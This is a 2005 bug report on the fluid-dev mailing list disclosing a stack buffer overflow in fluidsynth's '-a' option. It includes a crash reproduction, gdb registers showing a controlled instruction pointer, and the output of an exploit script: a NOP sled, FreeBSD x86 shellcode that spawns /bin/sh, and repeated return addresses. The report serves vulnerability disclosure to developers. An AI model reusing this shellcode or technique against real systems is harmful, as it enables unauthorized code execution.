[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[fluid-dev] Bug Report: -a overflow
From: |
Axioplase |
Subject: |
[fluid-dev] Bug Report: -a overflow |
Date: |
Mon, 07 Feb 2005 18:07:31 +0100 |
User-agent: |
Mozilla Thunderbird 0.8 (X11/20040926) |
fluidsynth can be exploited through an overflow when passing an argument
to the "-a" option.
See attached bug report.
Though there isn't a big risk that fluidsynth is suid root, that's a bug
anyway...
Axioplase.
--
<PaXaL2> fait chier les souris sans fil
<PaXaL2> je l'ai paumée
$ uname -a 17:55
FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC
2004 address@hidden:/usr/obj/usr/src/sys/GENERIC i386
$ fluidsynth --version 17:55
fluidsynth 1.0.3
$fluidsynth -a `perl -e 'print "A"x500'`
segmentation fault (core dumped) fluidsynth -a `perl -e 'print "A"x500'`
$gdb -core fluidsynth.core
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software
Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd".
Core was generated by `fluidsynth'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x0 0
edx 0x280c623e 671900222
ebx 0x280c56a4 671897252
esp 0xbfbfe6cc 0xbfbfe6cc
ebp 0x280c5020 0x280c5020
esi 0x1 1
edi 0x280c6020 671899680
eip 0x41414141 0x41414141
eflags 0x10292 66194
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x97 151
$ fluidsynth -a `./expl.pl 578 0`
using adress 0xbfbfeb50
using exploit
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x17\x5e\x31\xc0\x50\x88\x
46\x07\x89\x46\x08\x89\xf7\xb0\x08\x01\xc7\x57\x56\xb0\x3b\x50\xcd\x80\xe8\xe4\x
ff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x90\x90\x90\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf
$ echo exploit worked > r00ted
- [fluid-dev] Bug Report: -a overflow,
Axioplase <=